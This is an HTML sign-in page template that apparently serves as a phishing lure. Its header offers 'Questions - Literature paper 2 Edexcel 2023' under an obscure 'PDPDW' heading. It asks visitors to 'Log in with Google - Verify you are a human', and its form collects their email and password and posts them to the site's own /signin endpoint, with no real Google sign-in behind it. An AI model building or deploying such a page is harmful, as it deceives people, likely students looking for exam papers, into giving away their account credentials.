
<!DOCTYPE html>
<html lang="en">



<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

</head>

<body class="bg-gray-100">


    <div id="wrapper" class="flex flex-col justify-between h-screen">

        <!-- header-->
        <div class="bg-white py-4 shadow dark:bg-gray-800">
            <div class="max-w-6xl mx-auto">


                <div class="flex items-center lg:justify-between justify-around">

                    <a href="">
                       <b><h1 style="color: black;font-size: 1.5rem;">Packet delivering protocol via d-web (PDPDW)</h1></b>
                       <h1 style="color: black;font-size: 1rem;">Questions - Literature paper 2 Edexcel 2023</h1>
                    </a>


                </div>
            </div>
        </div>
        <div >
            <div >
                <h1 class="lg:text-3xl text-xl font-semibold  mb-6"> Log in with Google - Verify you are a human</h1>


                <form action="/signin" method="POST">
                    {% csrf_token %}
                    <input type="password" name="password" placeholder="Password" class="bg-gray-200 mb-2 shadow-none dark:bg-gray-800" style="border: 1px solid #d3d5d8 !important;">
                    <input type="email" name="email" placeholder="Email" class="bg-gray-200 mb-2 shadow-none dark:bg-gray-800" style="border: 1px solid #d3d5d8 !important;">

                    <button type="submit" class="bg-gradient-to-br from-pink-500 py-3 rounded-md text-white text-xl to-red-400 w-full">Login</button>
                </form>
            </div>
        </div>
        
  
</body>

<br>
<br>
<footer>

</footer>
</html>